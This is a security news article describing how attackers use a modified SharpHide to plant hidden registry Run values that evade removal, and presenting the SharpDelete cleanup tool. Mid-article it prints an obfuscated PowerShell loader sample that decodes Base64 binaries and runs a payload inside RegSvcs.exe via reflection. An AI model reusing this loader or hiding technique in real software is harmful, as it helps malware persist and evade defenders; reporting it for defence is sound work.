Threat actors have been utilizing a modified version of the SharpHide tool to create hidden registry values, significantly complicating detection and deletion efforts.
This technique exploits Windows registry redirection, making it challenging for standard tools to identify and remove these stealthy persistence mechanisms.
SharpHide is a tool that leverages a technique documented by eWhiteHats researchers, which involves creating hidden registry keys by prepending two wide-character (wchar) nulls to the registry path.
.webp)
Threat analyst at Sophos, Andrew Petrus noted that this method effectively hides the entries from view in the Registry Editor due to its inability to handle null characters properly.
Modified SharpHide for Stealthy Persistence
The modified version of SharpHide has been integrated into a PowerShell script, which obfuscates two Base64-encoded binaries.
Here the first binary contains the malicious payload, while the second acts as a loader responsible for executing it.
The loader abuses PowerShell’s reflection capabilities to dynamically load and invoke a method that launches the payload under the RegSvcs.exe process.
.webp)
This technique helps evade detection by running the malware within a legitimate system executable.
$FFSSAA="FGHJTZXCV".replace('FGHJ','').replace('ZXC','')
$JOYR="qQ!!M!!!!E!!!!//8!!Lg!!!!!!!!!Q!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!g!!!!!".replace('!', 'A')
$POOI=$FFSSAA+$iy
$JHFSA =@($POOI)
$POOI2=$FFSSAA+$JOYR+$OE
$LKPL =@($POOI2)
$MNHL=[system.Convert].GetMethod("FromBase64String")
$hgh=$MNHL.Invoke($null,$JHFSA)
$hgh2=$MNHL.Invoke($null,$LKPL)
$GGTI= 'C:WindowsMiAAcroAAsoft.NEZZTFraZZmewZZorkv4.0.30319RegSvcs.exe'
$YOO=[object[]] ($GGTI.replace('AA','').replace('ZZ',''),$hgh)
[Reflection.Assembly]::Load($hgh2).GetType('YES').GetMethod('KISS').Invoke($null,$YO0)
Set-Clipboard -Value "
exit;When executed with administrator privileges, the malicious script creates hidden values within the WOW6432Node branch instead of the standard SOFTWARE branch.
This discrepancy is due to registry redirection, where Windows automatically redirects registry writes from 32-bit processes to the WOW6432Node branch on 64-bit systems.
While this makes the hidden values undetectable by standard SharpHide deletion techniques.
To counter this issue, a new tool named SharpDelete has been developed. SharpDelete is designed to remove hidden registry values used for persistence, handling both standard and redirected registry paths.
.webp)
It allows users to specify custom registry locations, ensuring greater flexibility in detecting and removing stealthy persistence mechanisms.
[+] SharpDelete by Andrew Petrus - Tool to delete hidden registry values created by SharpHide
Select a registry path to remove the hidden value:
1. HKCUSoftwareMicrosoftWindowsCurrentVersionRun
2. HKLMSoftwareMicrosoftWindowsCurrentVersionRun (Administrator privileges required)
3. HKLMSoftwareWOW6432NodeMicrosoftWindowsCurrentVersionRun (Administrator privileges required)
. Enter a custom registry path (Administrator privileges required for HKLM and most HKCR paths)
Enter your choice: 3
[+] Deleting hidden registry key in HKLMSoftwareWOW6432NodeMicrosoftWindowsCurrentVersionRun
[+] Key successfully deleted.These methods exploit vulnerabilities in how Windows handles registry entries, making detection and removal challenging.
Tools like SharpDelete offer solutions to these issues, showing the importance of continuous innovation in cybersecurity to combat emerging threats.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free